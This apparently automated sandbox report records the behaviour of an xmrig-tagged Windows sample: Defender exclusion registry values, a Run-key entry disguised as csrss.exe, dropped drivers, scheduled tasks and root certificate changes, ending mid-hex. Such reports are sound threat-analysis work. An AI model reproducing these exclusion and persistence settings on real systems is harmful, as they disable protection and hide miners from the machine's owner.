xmrig

miner xmrig

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240307045316.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8